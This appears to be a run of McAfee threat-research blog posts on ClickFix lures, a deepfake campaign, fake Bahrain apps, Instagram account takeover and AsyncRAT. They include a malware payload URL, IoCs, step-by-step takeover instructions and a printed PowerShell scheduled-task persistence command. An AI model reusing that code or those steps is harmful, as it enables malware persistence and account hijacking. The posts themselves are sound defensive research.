Upon further inspection of the HTML page, we found a javascript at the end of the code.

Figure 6: Decoding function snippet

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.

Let’s delve into it practically:

Figure 7: Clipboard contains malicious command

The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to further convince the user to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature.

Once the user does this, the HTA file gets downloaded.

Figure 8: HTA code snippet

The above file attempts to connect to the marked domain and execute a PowerShell file from this malicious source. Given below is the malicious script that is stored remotely and executed.

Figure 9: Powershell code snippet

As this PowerShell script is executed implicitly without any user interaction, a folder is created in the C drive where an AutoIt executable and script are dropped and executed automatically.

Figure 10: Downloaded zip contains AutoIT script

Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.

A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.

Lumma Stealer ingesting via “ClickFix”

McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.

Figure 11: Showing error on accessing the webpage

It directs the target user to perform the following steps:

1. Click on the “Copy Fix” button.
2. Right-click on the Windows icon.
3. Open Windows PowerShell (Admin).
4. Right-click within the open terminal window.
5. Wait for the update to complete.

Let’s analyze the code that gets copied when clicking the “Copy Fix” button.

Figure 12: Base64-encoded content

As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:

Figure 13: After decoding the Base64 content

This PowerShell script flushes the DNS cache and then decodes a base64-encoded command to fetch and execute a script from a remote URL https://weoleycastletaxis.co.uk/chao/baby/cow[.]html, masquerading the request with a specific User-Agent header. The fetched script is then executed, and the screen is cleared to hide the actions. Subsequently, it decodes another base64 string to execute a command that sets the clipboard content to a space character. The script is likely designed for malicious purposes, such as downloading and executing remote code covertly while attempting to hide its activity from the user.

Upon execution, the following process tree flashes:

Figure 14: Process Tree

As we know it is downloading the malware from the given URL, a new folder is created in a Temp folder and a zip is downloaded:

Figure 15: Network activity

The malware is unzipped and dropped in the same folder:

Figure 16: Dropped files

The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.

Conclusion:

In conclusion, the Clickfix social engineering technique showcases a highly effective and technical method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.

Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.

Mitigations:

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

1. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
2. Install and maintain updated antivirus and anti-malware software on all endpoints.
3. Implement robust email filtering to block phishing emails and malicious attachments.
4. Use web filtering solutions to prevent access to known malicious websites.
5. Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
6. Use network segmentation to limit the spread of malware within the organization.
7. Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
8. Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
9. Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
10. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
11. Continuously monitor and analyze system and network logs for signs of compromise.
12. Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
13. Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.

Indicators of Compromise (IoCs)

File	SHA256
DarkGate
Email	c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3
Html	0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889
HTA	5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf
PS	e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2
ZIP	8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1
AutoIT script	7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81
Lumma Stealer
URL	tuchinehd[.]com
PS	07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073
ZIP	6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8
EXE	e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9

 

The post ClickFix Deception: A Social Engineering Tactic to Deploy Malware appeared first on McAfee Blog.

Olympics Has Fallen – A Misinformation Campaign Featuring a Voice Cloned Elon Musk

Authored by Lakshya Mathur and Abhishek Karnik

As the world gears up for the 2024 Paris Olympics, excitement is building, and so is the potential for scams. From fake ticket sales to counterfeit merchandise, scammers are on the prowl, leveraging big events to trick unsuspecting fans. Recently, McAfee researchers uncovered a particularly malicious scam that not only aims to deceive but also to portray the International Olympics Committee (IOC) as corrupt. 

This scam involves sophisticated social engineering techniques, where the scammers aim to deceive. They’ve become more accessible than ever thanks to advancements in Artificial Intelligence (AI). Tools like audio cloning enable scammers to create convincing fake audio messages at a low cost. These technologies were highlighted in McAfee’s AI Impersonator report last year, showcasing the growing threat of such tech in the hands of fraudsters. 

The latest scheme involves a fictitious Amazon Prime series titled “Olympics has Fallen II: The End of Thomas Bach,” narrated by a deepfake version of Elon Musk’s voice. This fake series was reported to have been released on a Telegram channel on June 24th, 2024. It’s a stark reminder of the lengths to which scammers will go to spread misinformation and exploit public figures to create believable narratives. 

As the Olympic Games approach, it’s crucial to stay vigilant and question the authenticity of sensational claims, especially those found on less regulated platforms like Telegram. Always verify information through official channels to avoid falling victim to these sophisticated scams. 

 As we approach the Olympic Games, it’s crucial to stay vigilant and question the authenticity of sensational claims, especially those found on less regulated platforms like Telegram. Always verify information through official channels to avoid falling victim to these sophisticated scams.

Cover Image of the series

This series seems to be the work of the same creator who, a year ago, put out a similar short series titled “Olympics has Fallen,” falsely presented as a Netflix series featuring a deepfake voice of Tom Cruise. With the Olympics beginning, this new release looks to be a sequel to last year’s fabrication. 

 

Image and Description of last year’s released series

 

These so-called documentaries are currently being distributed via Telegram channels. The primary aim of this series is to target the Olympics and discredit its leadership. Within just a week of its release, the series has already attracted over 150,000 viewers, and the numbers continue to climb. 

In addition to claiming to be an Amazon Prime story, the creators of this content have also circulated images of what seem to be fabricated endorsements and reviews from reputable publishers, enhancing their attempt at social engineering. 

Fake endorsement of famous publishers

This 3-part series consists of episodes utilizing AI voice cloning, image diffusion and lip-sync to piece together a fake narration. A lot of effort has been expended to make the video look like a professionally created series. However, there are certain hints in the video, such as the picture-in-picture overlay that appears at various points of the series. Through close observation, there are certain glitches 

Overlay video within the series with some discrepancies 

The original video appears to be from a Wall Street Journal (WSJ) interview that has then been altered and modified (noticed the background). The audio clone is almost indiscernible by human inspection. 

 

 

Original video snapshot from WSJ Interview

Modified and altered video snapshot from fake series 

 

Episodes thumbnails and their descriptions captured from the telegram channel

 

Elon Musk’s voice has been a target for impersonation before. In fact, McAfee’s 2023 Hacker Celebrity Hot List placed him at number six, highlighting his status as one of the most frequently mimicked public figures in cryptocurrency scams. 

As the prevalence of deepfakes and related scams continues to grow, along with campaigns of misinformation and disinformation, McAfee has developed deepfake audio detection technology. Showcased on Intel’s AI PCs at RSA in May, McAfee’s Deepfake Detector – formerly known as Project Mockingbird – helps people discern truth from fiction and defends consumers against cybercriminals utilizing fabricated, AI-generated audio to carry out scams that rob people of money and personal information, enable cyberbullying, and manipulate the public image of prominent figures.  

With the 2024 Olympics on the horizon, McAfee predicts a surge in scams involving AI tools. Whether you’re planning to travel to the summer Olympics or just following the excitement from home, it’s crucial to remain alert. Be wary of unsolicited text messages offering deals, steer clear of unfamiliar websites, and be skeptical of the information shared on various social platforms. It’s important to maintain a critical eye and use tools that enhance your online safety. 

McAfee is committed to empowering consumers to make informed decisions by providing tools that identify AI-generated content and raising awareness about their application where necessary. AI generated content is becoming increasingly believable nowadays. Some key recommendations while viewing content online 

1. Be skeptical of content from untrusted sources – Always question the motive. In this case, the content is accessible on Telegram channels and posted to uncommon public cloud storage.  
2. Be vigilant while viewing the content – Most AI fabrications will have some flaws, although it’s becoming increasingly more difficult to spot such discrepancies at glance. In this video, we noted some obvious indicators that appeared to be forged, however it is slightly more complicated with the audio. 
3. Cross-verify information – Any cross-validation of this content based on the title on popular search engines or by searching Amazon Prime content, would very quickly lead consumers to realize that something is amiss. 

Note: McAfee is not affiliated with the Olympics and nothing in this article should be interpreted as indicating or implying one. The purpose of this article is to help build awareness against misinformation campaigns. “Olympics Has Fallen II” is the name of one such campaign discovered by McAfee. 

The post Olympics Has Fallen – A Misinformation Campaign Featuring a Voice Cloned Elon Musk appeared first on McAfee Blog.

The Kaspersky Software Ban—What You Need to Know to Stay Safe Online

Citing national security concerns, the U.S. Department of Commerce has issued a ban on the sale of all Kaspersky online protection software in the U.S. This ban takes effect immediately.  

Of major importance to current customers of Kaspersky online protection, the ban also extends to security updates that keep its protection current. Soon, Kaspersky users will find themselves unprotected from the latest threats. 

Current Kaspersky users have until September 29, 2024 to switch to new online protection software. On that date, updates will cease. In fact, the Department of Commerce shared this message with Kaspersky customers: 

“I would encourage you, in as strong as possible terms, to immediately stop using that [Kaspersky] software and switch to an alternative in order to protect yourself and your data and your family.” 

As providers of online protection ourselves, we believe every person has the right to be protected online. Of course, we (and many industry experts!) believe McAfee online protection to be second to none, but we encourage every single person to take proactive steps in securing their digital lives, whether with McAfee or a different provider. There is simply too much at stake to take your chances. The nature of life online today means we are living in a time of rising cases of online identity theft, data breaches, scam texts, and data mining. 

If you’re a current Kaspersky US customer, we hope you’ll strongly consider McAfee as you look for a safe and secure replacement. For a limited time, you can get a $10 discount to switch to McAfee using code MCAFEEKASUS10 at checkout.

With that, we put together a quick Q&A for current Kaspersky users who need to switch their online protection software quickly. And as you’ll see, the Department of Commerce urges you to switch immediately.  

Did the U.S. government ban the sale of Kaspersky? 

Yes. The Department of Commerce has issued what’s called a “Final Determination.” In the document, the government asserts that:  

“The Department finds that Kaspersky’s provision of cybersecurity and anti-virus software to U.S. persons, including through third-party entities that integrate Kaspersky cybersecurity or anti-virus software into commercial hardware or software, poses undue and unacceptable risks to U.S. national security and to the security and safety of U.S. persons.”

(i) This news follows the 2017 ban on using Kaspersky software on government devices. (ii) That ban alleged that Russian hackers used the software to steal classified materials from a device that had Kaspersky software installed. (iii) Kaspersky has denied such allegations. 

Will I have to get new online protection software if I use Kaspersky? 

Yes. In addition to barring new sales or agreements with U.S. persons from July 20, the ban also applies to software updates. Like all online protection software, updates keep people safe from the latest threats. Without updates, the software leaves people more and more vulnerable over time. The update piece of the ban takes hold on September 29. With that, current users have roughly three months to get new online protection that will keep them protected online. 

How do I remove Kaspersky software? 

The answer depends on your device. The links to the following support pages can walk you through the process: 

• Windows: https://support.microsoft.com/en-us/windows/uninstall-or-remove-apps-and-programs-in-windows4b55f974-2cc6-2d2b-d092-5905080eaf98 

• Mac OS: https://support.apple.com/en-us/HT202235  

• iOS/iPadOS: https://support.apple.com/guide/iphone/remove-apps-iph248b543ca/ios  

• Android: https://support.google.com/googleplay/answer/2521768 

What should I look for when it comes to online protection? 

Today, you need more than anti-virus to keep you safe against the sophisticated threats of today’s digital age. You need comprehensive online protection. By “comprehensive” we mean software that protects your devices, identity, and privacy. Comprehensive online protection software from McAfee covers all three — because hackers, scammers, and thieves target all three.  

“Comprehensive” also means that your software continues to grow and evolve just as the internet does. It proactively rolls out new features as new threats appear, such as: 

Text Scam Detector that helps protect you against the latest scams via text, email, QR codes, and on social media. Also, should you accidentally click, web protection blocks sketchy links that crop up in searches and sites. 

Social Privacy Manager that helps you adjust more than 100 privacy settings across your social media accounts in only a few clicks. It also protects privacy on TikTok, making ours the first privacy service to protect people on that platform. For families, that means we now cover the top two platforms that teens use, TikTok and YouTube.  

AI-powered protection that doesn’t slow you down. For more than a decade, our award-winning protection has used AI to block the latest threats — and today it provides 3x faster scans with 75% fewer processes running on the PC. Independent tests from labs like AV-Comparatives have consistently awarded McAfee with the highest marks for both protection and for performance. 

 

What should I do about the Kaspersky ban? 

As the Department of Commerce urges, switch now.  

Yet, make a considered choice. Comprehensive online protection software that looks out for your devices, identity, and privacy is a must — something you are likely aware of already as a Kaspersky user. 

We hope this rundown of the Kaspersky news helps as you seek new protection. And we also hope you’ll give us a close look. Our decades-long track record of award-winning protection and the highest marks from independent labs speaks to how strongly we feel about protecting you and everyone online. Kaspersky US customers can get a discount to switch to McAfee for a limited time, using code MCAFEEKASUS10 at checkout.

 

The post The Kaspersky Software Ban—What You Need to Know to Stay Safe Online appeared first on McAfee Blog.

Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud

Authored by Dexter Shin

Many government agencies provide their services online for the convenience of their citizens. Also, if this service could be provided through a mobile app, it would be very convenient and accessible. But what happens when malware pretends to be these services?

McAfee Mobile Research Team found an InfoStealer Android malware pretending to be a government agency service in Bahrain. This malware pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users who are deceived by advertisements that they are available on mobile will be provided with the necessary personal information for these services without a doubt. They reach users in various ways, including Facebook and SMS messages. Users who are not familiar with these attacks easily make the mistake of sending personal information.

Detailed pretended app

In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. They provide a variety of mobile services, and most apps provide only one service per app. However, this fake app promotes providing more than one service.

Figure 1. Legitimate official LMRA website

Figure 2. Fake app named LMRA

Excluding the most frequently found fake apps pretending LMRA, there are various fake apps included Bank of Bahrain and Kuwait (BBK), BenefitPay, a fintech company in Bahrain, and even apps pretending to be related to Bitcoin or loans. These apps use the same techniques as the LMRA fake apps to steal personal information.

Figure 3. Various fake apps using the same techniques

From the type of app that this malware pretends, we can guess that the purpose is financial fraud to use the personal information it has stolen. Moreover, someone has been affected by this campaign as shown in the picture below.

Figure 4. Victims of financial fraud (Source: Reddit)

Distribution method

They distribute these apps using Facebook pages and SMS messages. Facebook pages are fake and malware author is constantly creating new pages. These pages direct users to phishing sites, either WordPress blog sites or custom sites designed to download apps.

Figure 5. Facebook profile and page with a link to the phishing site

Figure 6. One of the phishing sites designed to download app

In the case of SMS, social engineering messages are sent to trick users into clicking a link so that they feel the need to urgently confirm.

Figure 7. Phishing message using SMS (Source: Reddit)

What they want

When the user launches the app, the app shows a large legitimate icon for users to be mistaken. And it asks for the CPR and phone number. The CPR number is an exclusive 9-digit identifier given to each resident in Bahrain. There is a “Verify” button, but it is simply a button to send information to the C2 server. If users input their information, it goes directly to the next screen without verification. This step just stores the information for the next step.

Figure 8. The first screen (left) and next screen of a fake app (right)

There are various menus, but they are all linked to the same URL. The parameter value is the CPR and phone numbers input by the user on the first screen.

Figure 9. All menus are linked to the same URL

The last page asks for the user’s full name, email, and date of birth. After inputting everything and clicking the “Send” button, all information inputted so far will be sent to the malware author’s c2 server.

Figure 10. All data sent to C2 server

After sending, it shows a completion page to trick the user. It shows a message saying you will receive an email within 24 hours. But it is just a counter that decreases automatically. So, it does nothing after 24 hours. In other words, while users are waiting for the confirmation email for 24 hours, cybercriminals will exploit the stolen information to steal victims’ financial assets.

Figure 11. Completion page to trick users

In addition, they have a payload for stealing SMS. This app has a receiver that works when SMS is received. So as soon as SMS comes, it sends an SMS message to the C2 server without notifying the user.

Figure 12. Payload for stealing SMS

Dynamic loading of phishing sites via Firebase

We confirmed that there are two types of these apps. There is a type that implements a custom C2 server and receives data directly through web API, and another type is an app that uses Firebase. Firebase is a backend service platform provided by Google. Among many services, Firestore can store data as a database. This malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.

For apps that use Firebase, dynamically load phishing URLs stored in Firestore. Therefore, even if a phishing site is blocked, it is possible to respond quickly to maintain already installed victims by changing the URL stored in Firestore.

Figure 13. Dynamically loading phishing site loaded in webview

Conclusion

According to our detection telemetry data, there are 62 users have already used this app in Bahrain. However, since this data is a number at the time of writing, this number is expected to continue to increase, considering that new Facebook pages are still being actively created.

Recent malware tends to target specific countries or users rather than widespread attacks. These attacks may be difficult for general users to distinguish because malware accurately uses the parts needed by users living in a specific country. So we recommend users install secure software to protect their devices. Also, users are encouraged to download and use apps from official app stores like Google Play Store or Apple AppStore. If you can’t find an app in these stores, you must download the app provided on the official website.

McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.

Indicators of Compromise (IOCs)

Samples:

SHA256	Package Name	App Name
6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c	com.ariashirazi.instabrowser	LMRA
5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d	com.npra.bahrain.five	LMRA Bahrain
b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb	com.npra.bahrain.five	LMRA Bahrain
f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a	com.lmra.nine.lmranine	LMRA
bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730	com.stich.inches	Visa Update
8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba	com.ariashirazi.instabrowser	EasyLoan
164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819	com.ariashirazi.instabrowser	BTC Flasher
94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44	com.ariashirazi.instabrowser	BenefitPay
d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546	com.lymors.lulumoney	BBK Loan App

Domains:

• https[://]lmraa.com
• https[://]lmjbfv.site
• https[://]dbjiud.site
• https[://]a.jobshuntt.com
• https[://]shop.wecarerelief.ca

Firebase(for C2):

• https[://]npra-5.firebaseio.com
• https[://]lmra9-38b17.firebaseio.com
• https[://]practice-8e048.firebaseio.com

The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.

How Scammers Hijack Your Instagram

Authored by Vignesh Dhatchanamoorthy, Rachana S

Instagram, with its vast user base and dynamic platform, has become a hotbed for scams and fraudulent activities. From phishing attempts to fake giveaways, scammers employ a range of tactics to exploit user trust and vulnerability. These scams often prey on people’s desire for social validation, financial gain, or exclusive opportunities, luring them into traps that can compromise their personal accounts and identity.

McAfee has observed a concerning scam emerging on Instagram, where scammers are exploiting the platform’s influencer program to deceive users. This manipulation of the influencer ecosystem underscores the adaptability and cunning of online fraudsters in their pursuit of ill-gotten gains.

Brand Ambassador and influencer program scams:

The Instagram influencer program, designed to empower content creators and influencers by providing opportunities for collaboration and brand partnerships, has inadvertently become a target for exploitation. Scammers are leveraging the allure of influencer status to lure unsuspecting individuals into fraudulent schemes, promising fame, fortune, and exclusive opportunities in exchange for participation.

The first step involves a cybercrook creating a dummy account and using it to hack into a target’s Instagram account. Using those hacked accounts hackers then share posts about Bitcoin and other cryptocurrencies. Finally, the hacked accounts are used to scam target friends with a request that they vote for them to win an influencer contest.

After this series of steps is complete, the scammer will first identify the target and then send them a link with a Gmail email address to vote in their favor.

Fig 1: Scammer Message

While the link in the voting request message likely leads to a legitimate Instagram page, victims are often directed to an Instagram email update page upon clicking — not the promised voting page.  Also, since the account sending the voting request is likely familiar to the scam target, they are more likely to enter the scammer’s email ID without examining it closely.

During our research, we saw scammers like Instagram’s accounts center link to their targets like below hxxp[.]//accountscenter.instagram.com/personal_info/contact_points/contact_point_type=email&dialog_type=add_contact_point

Fig 2. Email Updating Page

We took this opportunity to gain more insight into the details of how these deceptive tactics are carried out, creating an email account (scammerxxxx.com and victimxxxx.com) and a dummy Instagram account using that email (victimxxxx.com) for testing purposes.

Fig 3. Victim’s Personal Details

We visited the URL provided in the chat and entered our testing email ID scammerxxxx.com instead of entering the email address provided by the scammer, which was “vvote8399@gmail.com”

Fig 4. Adding Scammer’s Email Address in Victim Account

After adding the scammerxxxx.com address in the email address field, we received a notification stating, “Adding this email will replace vitimxxxx.com on this Instagram account”.

This is the point at which a scam target will fall victim to this type of scam if they are not aware that they are giving someone else, with access to the scammerxxxx.com email address, control of their Instagram account.

After selecting Next, we were redirected to the confirmation code page. Here, scammers will send the confirmation code received in their email account and provide that code to victims, via an additional Instagram message, to complete the email updating process.

In our testing case, the verification code was sent to the email address scammerxxxx.com.

Fig 5. Confirmation Code Page

We received the verification code in our scammerxxxx.com account and submitted it on the confirmation code page.

Fig 6. Confirmation Code Mail

Once the ‘Add an Email Address’ procedure is completed, the scammer’s email address is linked to the victim’s Instagram account. As a result, the actual user will be unable to log in to their account due to the updated email address.

Fig 7. Victim’s Profile after updating Scammer’s email

Because the scammer’s email address (scammerxxxx.com) was updated the account owner — the scam victim will not be able to access their account and will instead receive the message “Sorry, your password was incorrect. Please double-check your password.”

Fig 8. Victim trying to login to their account.

The scammer will now change the victim’s account password by using the “forgot password” function with the new, scammer email login ID.

Fig 9. Forgot Password Page

 

The password reset code will be sent to the scammer’s email address (scammerxxxx.com).

Fig 10. Reset the Password token received in the Scammer’s email

After getting the email, the scammer will “Reset your password” for the victim’s account.

Fig 11. Scammer Resetting the Password

After resetting the password, the scammer can take over the victim’s Instagram account.

Fig 12. The scammer took over the victim’s Instagram account.

To protect yourself from Instagram scams:

• Be cautious of contests, polls, or surveys that seem too good to be true or request sensitive information.
• Verify the legitimacy of contests or giveaways by checking the account’s authenticity, looking for official rules or terms, and researching the organizer.
• Avoid clicking on suspicious links or providing personal information to unknown sources.
• Enable two-factor authentication (2FA) on your Instagram account to add an extra layer of security.
• Report suspicious activity or accounts to Instagram for investigation.
• If any of your friends ask you to help them, contact them via text message or phone call, to ensure that their account has not been hacked first.

The post How Scammers Hijack Your Instagram appeared first on McAfee Blog.

How to Protect Your Internet-Connected Healthcare Devices

Fitness trackers worn on the wrist, glucose monitors that test blood sugar without a prick, and connected toothbrushes that let you know when you’ve missed a spot—welcome to internet-connected healthcare. It’s a new realm of care with breakthroughs big and small. Some you’ll find in your home, some you’ll find inside your doctor’s office, yet all of them are connected. Which means they all need to be protected. After all, they’re not tracking any old data. They’re tracking our health data, one of the most precious things we own.

What is internet-connected healthcare?

Internet-connected healthcare, also known as connected medicine, is a broad topic. On the consumer side, it covers everything from smart watches that track health data to wireless blood pressure monitors that you can use at home. On the practitioner side, it accounts for technologies ranging from electronic patient records, network-enabled diagnostic devices, remote patient monitoring in the form of wearable devices, apps for therapy, and even small cameras that can be swallowed in the form of a pill to get a view of a patient’s digestive system.

Additionally, it also includes telemedicine visits, where you can get a medical issue diagnosed and treated remotely via your smartphone or computer by way of a video conference or a healthcare provider’s portal—which you can read about more in one of my blogs. In all, big digital changes are taking place in healthcare—a transformation that’s rapidly taking shape to the tune of a global market expected to top USD 534.3 billion by 2025.

Privacy and security in internet-connected healthcare

Advances in digital healthcare have come more slowly compared to other aspects of our lives, such as consumer devices like phones and tablets. Security is a top reason why. Not only must a healthcare device go through a rigorous design and approval process to ensure it’s safe, sound, and effective, but it’s also held to similar rigorous degrees of regulation when it comes to medical data privacy. For example, in the U.S., we have the Health Insurance Portability and Accountability Act of 1996 (HIPAA), which sets privacy and security standards for certain health information.

Taken together, this requires additional development time for any connected medical device or solution, in addition to the time it takes to develop one with the proper efficacy. Healthcare device manufacturers cannot simply move as quickly as, say, a smartphone manufacturer can. And rightfully so.

Seven tips for protecting your internet-connected healthcare devices

However, for this blog, we’ll focus on the home and personal side of the equation, with devices like fitness trackers, glucose monitors, smartwatches, and wearable devices in general—connected healthcare devices that more and more of us are purchasing on our own. To be clear, while these devices may not always be categorized as healthcare devices in the strictest (and regulatory) sense, they are gathering your health data, which you should absolutely protect. Here are some straightforward steps you can take:

1) First up, protect your phone

Many medical IoT devices use a smartphone as an interface, and as a means of gathering, storing, and sharing health data. So whether you’re an Android owner or iOS owner, get security software installed on your phone so you can protect all the things it accesses and controls. Additionally, installing it will protect you and your phone in general as well.

2) Set strong, unique passwords for your medical IoT devices

Some IoT devices have found themselves open to attack because they come with a default username and password—which are often published on the internet. When you purchase any IoT device, set a fresh password using a strong method of password creation.  And keep those passwords safe. Instead of keeping them in a notebook or on sticky notes, consider using a password manager.

3) Use two-factor authentication

You’ve probably come across two-factor authentication while banking, shopping, or logging into any other number of accounts. Using a combination of your username, password, and a security code sent to another device you own (typically a mobile phone) makes it tougher for hackers to crack your device. If your IoT device supports two-factor authentication, use it for extra security.

4) Update your devices regularly

This is vital. Make sure you have the latest updates so that you get the latest functionality from your device. Equally important is that updates often contain security upgrades. If you can set your device to receive automatic updates, do so.

5) Secure your internet router

Your medical IoT device will invariably use your home Wi-Fi network to connect to the internet, just like your other devices. All the data that travels on there is personal and private, and that goes double for any health data that passes along it. Make sure you use a strong and unique password. Also, change the name of your router so it doesn’t give away your address or identity. One more step is to check that your router is using an encryption method, like WPA2, which will keep your signal secure. You may also want to consider investing in an advanced internet router that has built-in protection, which can secure and monitor any device that connects to your network.

6) Use a VPN and a comprehensive security solution

Similar to the above, another way you can further protect the health data you send over the internet is to use a virtual private network, or VPN. A VPN uses an encrypted connection to send and receive data, which shields it from prying eyes. A hacker attempting to eavesdrop on your session will effectively see a mishmash of garbage data, which helps keep your health data secure.

7) When purchasing, do your research

Read up on reviews and comments about the devices you’re interested in, along with news articles about their manufacturers. See what their track record is on security, such as if they’ve exposed data or otherwise left their users open to attack.

Take care of your health, and your health data

Bottom line, when we speak of connected healthcare, we’re ultimately speaking about one of the most personal things you own: your health data. That’s what’s being collected. And that’s what’s being transmitted by your home network. Take these extra measures to protect your devices, data, and yourself as you enjoy the benefits of the connected care you bring into your life and home.

The post How to Protect Your Internet-Connected Healthcare Devices appeared first on McAfee Blog.

From Spam to AsyncRAT: Tracking the Surge in Non-PE Cyber Threats

Authored by Yashvi Shah and Preksha Saxena

AsyncRAT, also known as “Asynchronous Remote Access Trojan,” represents a highly sophisticated malware variant meticulously crafted to breach computer systems security and steal confidential data. McAfee Labs has recently uncovered a novel infection chain, shedding light on its potent lethality and the various security bypass mechanisms it employs.

It utilizes a variety of file types, such as PowerShell, Windows Script File (WSF), VBScript (VBS), and others within a malicious HTML file. This multifaceted approach aims to circumvent antivirus detection methods and facilitate the distribution of infection.

Figure 1: AsyncRAT prevalence for the last one month

Infection Chain:

The infection initiates through a spam email containing an HTML page attachment. Upon unwittingly opening the HTML page, an automatic download of a Windows Script File (WSF) ensues. This WSF file is deliberately named in a manner suggestive of an Order ID, fostering the illusion of legitimacy and enticing the user to execute it. Subsequent to the execution of the WSF file, the infection progresses autonomously, necessitating no further user intervention. The subsequent stages of the infection chain encompass the deployment of Visual Basic Script (VBS), JavaScript (JS), Batch (BAT), Text (TXT), and PowerShell (PS1) files. Ultimately, the chain culminates in a process injection targeting aspnet_compiler.exe.

Figure 2: Infection Chain

Technical Analysis

Upon opening a spam email, the recipient unwittingly encounters a web link embedded within its contents. Upon clicking on the link, it triggers the opening of an HTML page. Simultaneously, the page initiates the download of a WSF (Windows Script File), setting into motion a potentially perilous sequence of events.

Figure 3:HTML page

The HTML file initiates the download of a WSF file. Disguised as an order-related document with numerous blank lines, the WSF file conceals malicious intent.  After its execution, no user interaction is required.

On executing wsf, we get the following process tree:

Figure 4: Process tree

Commandlines:

Upon investigation, we discovered the presence of code lines in wsf file that facilitate the download of another text file.

Figure 5:Content of wsf file

The downloaded text file, named “1.txt,” contains specific lines of code. These lines are programmed to download another file, referred to as “r.jpg,” but it is actually saved in the public folder under the name “ty.zip.” Subsequently, this zip file is extracted within the same public folder, resulting in the creation of multiple files.

Figure 6: Marked files are extracted in a public folder

Infection sequence:

a) The “ty.zip” file comprises 17 additional files. Among these, the file named “basta.js” is the first to be executed. The content of “basta.js” is as follows:

Figure 7: basta.js

b) “basta.js” invoked “node.bat” file from the same folder.

Figure 8: node.js

Explaining the command present in node.bat:

• $tr = New-Object -ComObject Schedule.Service;
  • This creates a new instance of the Windows Task Scheduler COM object.
• $tr.Connect();
  • This connects to the Task Scheduler service.
• $ta = $tr.NewTask(0);
  • This creates a new task object.
• $ta.RegistrationInfo.Description = ‘Runs a script every 2 minutes’;
  • This sets the description of the task.
• $ta.Settings.Enabled = $true;
  • This enables the task.
• $ta.Settings.DisallowStartIfOnBatteries = $false;
  • This allows the task to start even if the system is on battery power.
• $st = $ta.Triggers.Create(1);
  • This creates a trigger for the task. The value 1 corresponds to a trigger type of “Daily”.
• $st.StartBoundary = [DateTime]::Now.ToString(‘yyyy-MM-ddTHH:mm:ss’);
  • This sets the start time for the trigger to the current time.
• $st.Repetition.Interval = ‘PT2M’;
  • This sets the repetition interval for the trigger to 2 minutes.
• $md = $ta.Actions.Create(0);
  • This creates an action for the task. The value 0 corresponds to an action type of “Execute”.
• $md.Path = ‘C:\Users\Public\app.js’;
  • This sets the path of the script to be executed by the task.
• $ns = $tr.GetFolder(‘\’);
  • This gets the root folder of the Task Scheduler.
• $ns.RegisterTaskDefinition(‘cafee’, $ta, 6, $null, $null, 3);
  • This registers the task definition with the Task Scheduler. The task is named “cafee”. The parameters 6 and 3 correspond to constants for updating an existing task and allowing the task to be run on demand, respectively.

